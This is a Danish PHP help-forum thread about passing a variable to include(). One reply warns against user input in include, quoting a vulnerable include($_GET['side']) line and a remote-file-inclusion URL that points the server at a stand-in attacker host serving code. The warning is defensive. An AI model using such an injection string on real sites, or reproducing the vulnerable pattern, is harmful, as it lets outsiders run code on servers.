Søg
Avatar billede danic Nybegynder
30. januar 2010 - 09:39 Der er 5 kommentarer og
1 løsning

Kan man include en variable?

Kan man include en variable?

F.eks.
<?php include('$frontpage_info'); ?>

Eller hvad gør man så?
Avatar billede intenz Novice
30. januar 2010 - 09:47 #1
Det kan du sagtens.
<?php
$minfil = "fil.php";
include($minfil);
?>
Avatar billede danic Nybegynder
30. januar 2010 - 09:55 #2
Ah..

Fejlen var: <?php include('$frontpage_info'); ?>
skulle være: <?php include($frontpage_info); ?>
Avatar billede intenz Novice
30. januar 2010 - 10:13 #3
Ja, når du bruger en variabel i en funktion, skal den altid indsættes uden '' omkring sig. Den slags er kun til tekst-strenge.
Avatar billede phliplip Nybegynder
30. januar 2010 - 11:21 #4
HUSK HUSK HUSK!

ALDRIG at bruge nogen form for bruger input - $_GET/$_POST/$_REQUEST/$_COOKIE etc i dine include/require.
Især hvis fopen_wrappers er enabled.

Jeg overtog på et tidspunkt en hjemmeside, hvor der pludselig begyndte at ligge ukendte mapper og filer på serveren.

Det viste sig at navigationen på siden var baseret på noget i stil med

include($_GET['side'] . '.php');

Så kan du forestille dig hvad der sker hvis man skriver

http://mitdomain.dk/index.php?side=http://hackerdomain.com/skadeligkode.php?a=

og skadeligkode.txt indeholder (i dette tilfælde uskadelig kode)

<?php phpinfo(); ?>
Avatar billede majbom Novice
30. januar 2010 - 20:11 #5
-> #4 - smart ;)
Avatar billede phliplip Nybegynder
31. januar 2010 - 05:10 #6
Ja det tog også lidt tid før jeg opdagede hvor det lå begravet.
Det var kun fordi jeg brugte flere timer i access-log'en at jeg fandt ud af det!

Det mest indlysende er jo at skifte FTP pass osv.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Webudvikling kurser
Vi tilbyder markedets bedste kurser inden for webudvikling
Se alle Webudvikling kurser

Flere spørgsmål fra PHP kategorien

Titel Indlæg Oprettet Seneste aktivitet
Bruge PHP til at hente hjemmeside med fsockopen Af Strawberry i PHP 18 29/01/202613:08 02/02/202610:29
Hjemmeside der virker både på mobil og computer Af Strawberry i PHP 6 25/01/202620:06 30/01/202618:53
Hvordan får jeg reCAPTCHA på min hjemmeside? Af Strawberry i PHP 1 20/01/202621:11 23/01/202618:04
MS Graph vis kalenderaftaler Af dane022 i PHP 0 06/11/202508:43 -
Hente data fra DEVICE via websocket Af nemlig i PHP 6 25/06/202512:37 25/06/202519:17
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 17:03 Ny browser til windows xp Af Perfrank i Browsere
I går 12:48 Tæpperenser Af valby i Diverse
I går 07:16 Afkodning af stor xml fil Af erik_l i XML & XSLT
03/0218:12 Samsung A9+ udfordring Af mort1 i Tablet
03/0215:22 MS 365 fejler i mail og kalender Af ejgil703 i E-mail programmer
White papers
Flere white papers »